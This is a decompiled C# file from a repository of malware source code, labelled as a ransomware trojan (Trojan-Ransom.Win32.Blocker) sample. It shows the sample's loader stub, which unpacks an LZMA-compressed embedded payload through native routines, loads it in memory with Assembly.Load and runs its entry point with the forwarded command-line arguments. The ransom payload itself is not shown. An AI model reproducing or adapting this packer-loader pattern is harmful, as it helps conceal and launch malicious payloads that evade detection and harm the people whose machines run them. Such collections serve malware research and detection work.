MalwareSourceCode/MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/_003CModule_003E.cs

119 lines
4.7 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null
// MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe
using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
internal class \u003CModule\u003E
{
public static __FnPtr<int (uint, uint, uint)> LzmaVirtualFree;
public static __FnPtr<uint (uint, uint, uint, uint)> LzmaVirtualAlloc;
public static unsafe int main()
{
byte[] rawAssembly = new byte[(int) \u003CModule\u003E.GetoriginalSize()];
rawAssembly.Initialize();
fixed (byte* numPtr = &rawAssembly[0])
{
if (\u003CModule\u003E.GetoriginalData(numPtr) != 0)
{
Assembly assembly = Assembly.Load(rawAssembly);
int count1 = assembly.EntryPoint.GetParameters().Count;
object[] parameters = new object[count1];
if (count1 != 0)
{
string[] commandLineArgs = Environment.GetCommandLineArgs();
int count2 = Environment.GetCommandLineArgs().Count;
string[] strArray = new string[count2 - 1];
int index = 1;
if (1 < count2)
{
do
{
strArray[index - 1] = commandLineArgs[index];
++index;
}
while (index < count2);
}
parameters[0] = (object) strArray;
}
// ISSUE: explicit non-virtual call
__nonvirtual (assembly.EntryPoint.Invoke((object) null, parameters));
}
return 0;
}
}
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe void RangeDecoderInit([In] _CRangeDecoder* obj0, [In] byte* obj1, [In] uint obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint RangeDecoderDecodeDirectBits([In] _CRangeDecoder* obj0, [In] int obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderBitDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderBitTreeDecode(
[In] ushort* obj0,
[In] int obj1,
[In] _CRangeDecoder* obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderReverseBitTreeDecode(
[In] ushort* obj0,
[In] int obj1,
[In] _CRangeDecoder* obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe byte LzmaLiteralDecodeMatch(
[In] ushort* obj0,
[In] _CRangeDecoder* obj1,
[In] byte obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaLenDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaDecode(
[In] byte* obj0,
[In] uint obj1,
[In] int obj2,
[In] int obj3,
[In] int obj4,
[In] byte* obj5,
[In] uint obj6,
[In] byte* obj7,
[In] uint obj8);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaBlockUnPack(
[In] byte* obj0,
[In] byte* obj1,
[In] __FnPtr<uint (uint, uint, uint, uint)> obj2,
[In] __FnPtr<int (uint, uint, uint)> obj3);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint GetoriginalSize();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int GetoriginalData([In] byte* obj0);
}